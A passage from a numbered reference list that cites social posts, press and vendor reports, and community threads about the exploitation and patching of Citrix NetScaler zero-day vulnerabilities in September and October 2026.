76Beaumont, Oct 2 19:02 UTC - "to be confirmed but it looks like the pitboss fix is bypassable"Kevin Beaumonthttps://cyberplace.social/@GossiTheDog/117372864244958549
77Beaumont, Oct 2 19:19 UTC - one patched honeypot is running a downloaded binary; "sprayed and prayed"Kevin Beaumonthttps://cyberplace.social/@GossiTheDog/117372929427365765
78Beaumont, Oct 2 23:25 UTC - "the policy citrix gave out doesn't work for me" (reply to O_P about a responder policy from Citrix Support)Kevin Beaumonthttps://cyberplace.social/@GossiTheDog/117373896333693635
79Beaumont, Oct 3 01:40 UTC - "The Citrix support mitigations don't appear to work" (with a screenshot of an r/Citrix thread)Kevin Beaumonthttps://cyberplace.social/@GossiTheDog/117374427108683985
80Cybersecurity News - "Citrix NetScaler Keeps Rebooting Following the 0-Day Patch" (Guru Baran, Oct 3; page shows only the date; secondary, Reddit-based)Press and vendor coveragehttps://cybersecuritynews.com/citrix-netscaler-0-day-patch/
81BleepingComputer (Sep 29) - Hackers exploit Citrix NetScaler zero-day to deploy web shellsPress and vendor coveragehttps://www.bleepingcomputer.com/news/security/hackers-exploit-citrix-netscaler-zero-day-to-deploy-web-shells/
82BleepingComputer (Sep 27) - Citrix admins warned to shut down NetScalersPress and vendor coveragehttps://www.bleepingcomputer.com/news/security/citrix-admins-warned-to-shut-down-netscalers-over-2-exploited-zero-days/
83The Stack (Oct 1) - Banks, gov'ts, telcos hit by hackers amid escalating NetScaler incidentPress and vendor coveragehttps://www.thestack.technology/banks-govts-telcos-hit-by-hackers-amid-escalating-netscaler-incident-2/
84Help Net Security (Sep 30) - Suspected state-sponsored hackers exploited NetScaler zero-day since early September (CVE-2026-88772)Press and vendor coveragehttps://www.helpnetsecurity.com/2026/09/30/cve-2026-88772-netscaler-exploitation-zero-day/
85Cloudflare changelog (Oct 1) - WAF Release 2026-10-01, Emergency: Citrix NetScaler CVE-2026-88771 managed rulePress and vendor coveragehttps://developers.cloudflare.com/changelog/post/2026-10-01-emergency-waf-release/
86Qualys ThreatPROTECT (Sep 28) - Citrix NetScaler zero-day vulnerabilities exploited in attacksPress and vendor coveragehttps://threatprotect.qualys.com/2026/09/28/citrix-netscaler-adc-and-gateway-zero-day-vulnerabilities-exploited-in-attacks-cve-2026-88771-cve-2026-88772/
87The Hacker News (Oct 1) - Citrix NetScaler post-exploitation payload creates superuser, maps web shell to CSS-like URLs (note: THN has also published unrelated third-party-appliance breach coverage sometimes mislinked to NetScaler)Press and vendor coveragehttps://thehackernews.com/2026/10/citrix-netscaler-post-exploitation.html
88BleepingComputer (Sep 28) - CISA orders feds to patch exploited Citrix flaws by WednesdayPress and vendor coveragehttps://www.bleepingcomputer.com/news/security/cisa-orders-feds-to-patch-exploited-citrix-flaws-by-wednesday/
89SecurityWeek (Sep 28) - Citrix confirms 2 NetScaler zero-daysPress and vendor coveragehttps://www.securityweek.com/citrix-confirms-2-netscaler-zero-days-after-admins-pulled-the-plug/
90The Record (Sep 28) - US, UK warn of Citrix NetScaler zero-day bugPress and vendor coveragehttps://therecord.media/us-uk-warn-of-citrix-netscaler-zero-day-bug
91CyberScoop (Sep 28) - delayed-disclosure anglePress and vendor coveragehttps://cyberscoop.com/citrix-zero-days-delayed-disclosure/
92Sophos CTU (Sep 28) - CVE-2026-88771 / -88772 in active exploitationPress and vendor coveragehttps://www.sophos.com/en-us/blog/citrix-netscaler-cve-2026-88771-cve-2026-88772-in-active-exploitation
93Rapid7 ETR (Sep 28, last updated Sep 30)Press and vendor coveragehttps://www.rapid7.com/blog/post/etr-zero-day-exploitation-of-citrix-netscaler-adc-and-gateway-cve-2026-88771-and-cve-2026-88772/
94watchTowr FAQ (Sep 27-28)Press and vendor coveragehttps://watchtowr.com/intelligence/citrix-netscaler-zero-day-vulnerabilities-faq/
95The Register (Sep 29) - Custom malware used in Citrix 0-day attacks targeting govt, banks, professional servicesPress and vendor coveragehttps://www.theregister.com/security/2026/09/29/custom-malware-used-in-citrix-0-day-attacks-targeting-govt-banks-professional-services/5299867
96Unit 42 (Palo Alto Networks) - NetScaler zero-days threat brief (Sep 27, updated Sep 28 and Sep 30 with pre- and post-disclosure activity and IoCs)Press and vendor coveragehttps://unit42.paloaltonetworks.com/netscaler-zero-days-exploited/
97Cybersecurity Dive (Sep 28) - Shadowserver: more than 20,000 instances exposedPress and vendor coveragehttps://www.cybersecuritydive.com/news/citrix-upgrades-netscaler-exploitation/831502/
98Help Net Security (Sep 29) - NetScaler zero-day exploitation escalates into mass attacks (Lupovis, Censys)Press and vendor coveragehttps://www.helpnetsecurity.com/2026/09/29/netscaler-zero-day-exploitation-escalates-into-mass-attacks-cve-2026-88771/
99Ingeniøren (Sep 30) - Alvorlige huller i kendt software: PET, Forsvaret og Politiet hastelukker systemerPress and vendor coveragehttps://ing.dk/artikel/alvorlige-huller-i-kendt-software-pet-forsvaret-og-politiet-hastelukker-systemer
100SDxCentral (Sep 29) - NetScaler bugs bring critical sectors down in Europe (citing Techzine)Press and vendor coveragehttps://www.sdxcentral.com/news/netscaler-bugs-bring-critical-sectors-down-in-europe/
101Cybersecurity Dive (Sep 29) - Citrix NetScaler exploitation began days before public notificationPress and vendor coveragehttps://www.cybersecuritydive.com/news/citrix-netscaler-exploitation-days-before-notification/831634/
102heise online (Sep 27) - New zero-day exploits in Citrix NetScalerPress and vendor coveragehttps://www.heise.de/en/news/Security-researchers-warn-New-zero-day-exploits-in-Citrix-Netscaler-11467269.html
103heise online (Oct 3 10:23 CEST) - "Netscaler-Admins aufgepasst: Zero-Day verursacht Crashes und Codeausfuehrung" (Dr. Christopher Kunz; cites Beaumont and a watchTowr reproduction claim, confirmed by watchTowr's own post the same day)Press and vendor coveragehttps://www.heise.de/news/Netscaler-Admins-aufgepasst-Zero-Day-verursacht-Crashes-und-Codeausfuehrung-11474971.html
104Dark Reading (Sep 29) - Dual NetScaler Zero-Days Trigger Chaos for Citrix CustomersPress and vendor coveragehttps://www.darkreading.com/vulnerabilities-threats/netscaler-zero-days-chaos-citrix
105Omroep Brabant (Sep 27) - Storing bij ziekenhuizen door kritieke kwetsbaarheden in systeem (Amphia, ETZ, Z-CERT)Press and vendor coveragehttps://www.omroepbrabant.nl/nieuws/6028828/storing-bij-ziekenhuizen-door-kritieke-kwetsbaarheden-in-systeem
106r/Citrix - "vulnerability scans causing netscaler reboots" thread (early Oct; anonymous comments, unverified)Communityhttps://www.reddit.com/r/Citrix/comments/1wvwuno/vulnerability_scans_causing_netscaler_reboots/
107Maurice_Sec on X - notes from the field on NetScaler Console IoC scanner findingsCommunityhttps://x.com/Maurice_Sec/status/2104541998858240487
108r/Citrix - "Netscaler leak?" thread (~Sep 26)Communityhttps://www.reddit.com/r/Citrix/comments/1wqjk9a/netscaler_leak/
109r/Citrix - comment by asmOne (about 29 Sep; date approximate) quoting log-poison attemptsCommunityhttps://www.reddit.com/r/Citrix/comments/1wqjk9a/comment/pcub9wh/